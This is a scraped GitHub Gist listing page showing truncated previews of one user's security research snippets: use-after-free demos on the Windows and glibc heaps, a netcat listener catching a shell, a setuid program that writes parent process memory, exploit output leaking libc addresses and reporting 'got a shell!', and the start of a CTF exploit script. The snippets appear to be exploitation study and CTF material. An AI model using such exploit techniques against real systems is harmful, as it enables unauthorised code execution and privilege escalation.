Skip to content

Instantly share code, notes, and snippets.

@inaz2
inaz2 / Source.cpp
Created Jun 3, 2017
use-after-free on Low Fragmentation Heap (without /SDL, Windows 10, Visual Studio 2015)
View Source.cpp
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
class Cat {
char name[0x20];
public:
virtual void cry() { puts("meow"); };
};
@inaz2
inaz2 / test.c
Created Jun 3, 2017
use-after-free on glibc's ptmalloc (Ubuntu 16.04.2, Ubuntu GLIBC 2.23-0ubuntu7)
View test.c
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu7) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
View test.py
$ nc -v -l 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
View rails4_tamper_cookie.rb
View digits_tsne_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View digits_pca_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View iris_pca_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@inaz2
inaz2 / write_ppid_memory.c
Created Jan 4, 2017
write memory of the parent process via /proc/$PPID/mem
View write_ppid_memory.c
$ gcc write_ppid_memory.c -o write_ppid_memory
$ sudo chown root write_ppid_memory
$ sudo chmod u+s write_ppid_memory
$ ls -al
-rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory*
-rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c
View rec.py
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
View babyfengshui.py
from minipwn import *
def add_user(s, size_desc, name, text_len, text):
recvuntil(s, 'Action: ')
sendline(s, '0')
recvuntil(s, 'size of description: ')
sendline(s, str(size_desc))
recvuntil(s, 'name: ')
sendline(s, name)
recvuntil(s, 'text length: ')
You can’t perform that action at this time.